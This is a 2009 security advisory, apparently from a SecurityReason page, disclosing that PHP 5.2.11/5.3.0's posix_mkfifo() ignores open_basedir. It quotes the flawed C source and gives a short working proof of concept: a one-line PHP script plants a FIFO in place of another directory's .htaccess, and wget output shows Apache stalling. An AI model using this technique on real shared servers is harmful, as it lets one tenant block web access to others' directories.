PHP 5.3.0 5.2.11 posix_mkfifo() open_basedir bypass

Advisory Content :

[ PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ]

Author: Grzegorz Stachowiak

Date:
- - Dis.: 25.09.2009
- - Pub.: 29.09.2009

Risk: Low

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11 and prior

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.posix-mkfifo.php

- --- 1. PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ---

posix_mkfifo — Create a fifo special file (a named pipe)

posix_mkfifo() creates a special FIFO file which exists in the file system
and acts as a bidirectional communication endpoint for processes.

Function not check open_basedir value, so we can create any file in any
writable folder, if open_basedir is enabled. We can "freeze" Apache and
prevent access to any writable folder.

- ---ext/posix/posix.c---

PHP_FUNCTION(posix_mkfifo)
{
char *path;
int path_len;
long mode;
int result;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl", &path,
&path_len, &mode) == FAILURE) {
RETURN_FALSE;
}

if (PG(safe_mode) && (!php_checkuid(path, NULL, CHECKUID_ALLOW_ONLY_DIR)))
{ [1]
RETURN_FALSE;
}

result = mkfifo(path, mode);
if (result < 0) {
POSIX_G(last_error) = errno;
RETURN_FALSE;
}

RETURN_TRUE;
}

- ---ext/standard/file.c---

[1]. Function posix_mkfifo check only safe_mode value.

- ---example0 (5.2.11/5.3.0)---

x@x-desktop:/var/www/$ php -v

PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php -r "echo ini_get('open_basedir').PHP_EOL;

/var/www:/tmp

x@x-desktop:/var/www$

|----------------------------------------------------------------|

x@x-desktop:/var/www$ cat fifo.php

<?
posix_mkfifo('/home/y/www/.htaccess',0777);
?>
|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:31-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 25 [text/plain]

0K -> [100%]

(24.41 KB/s) - `config.txt' saved [25/25]

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php fifo.php

x@x-desktop:/var/www$

|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:43-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response...

|----------------------------------------------------------------|

Apache try receive access to .htaccess file, but fifo special file not
allow a "normal" read, so we can't read files in this directory and all
subdirectories.

- --- 3. Contact ---

Author: Grzegorz Stachowiak
Email: stachowiak {a|t} analogicode.pl

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

PHP 5.3.0 5.2.11 posix_mkfifo() open_basedir bypass